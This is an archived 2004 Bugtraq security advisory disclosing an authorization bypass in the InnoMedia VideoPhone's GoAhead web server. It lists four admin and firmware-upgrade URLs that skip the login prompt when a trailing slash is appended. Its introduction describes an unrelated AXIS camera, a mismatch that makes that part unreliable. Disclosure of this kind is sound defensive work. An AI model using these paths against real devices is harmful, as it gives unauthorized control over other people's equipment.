'InnoMedia VideoPhone Authorization Bypass'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    InnoMedia VideoPhone Authorization Bypass
From:       "Rafel Ivgi, The-Insider" <theinsider () 012 ! net ! il>
Date:       2004-02-28 12:27:49
Message-ID: 000501c3fdf6$478b9ce0$0b3016ac () fucku
[Download RAW message or body]

#######################################################################

Application:   InnoMedia VideoPhone
Server:            GoAhead-Webs
Vendors:         InnoMedia Pte Ltd
                         GoAhead Ltd
                         http://www.innomedia.com/
                         http://www.goahead.com/
Versions:        au75200xvi04010x
Platforms:       Windows
Bug:                Authorization Bypass
Risk:                High
Exploitation:   remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bugs
3) The Code

#######################################################################

===============
1) Introduction
===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming
video
from anywhere on your network. It lets you keep a close eye on the world
around
you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network
camera
can operate as a standalone or be placed wherever there is a LAN or Internet
connection,
or an available modem.

#######################################################################

======
2) Bug
======

Browsing the server normally
http://<host>/
Will show some info about the server.
The server's menu appears on the left side and contains a few links
to protected files, which setup the server's settings/configuration.
When refering to any of the menu's "protected" links, such as:
http://<host>/videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a
folder.
http://<host>/videophone_admindetail.asp/

#######################################################################

===========
3) The Code
===========

http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic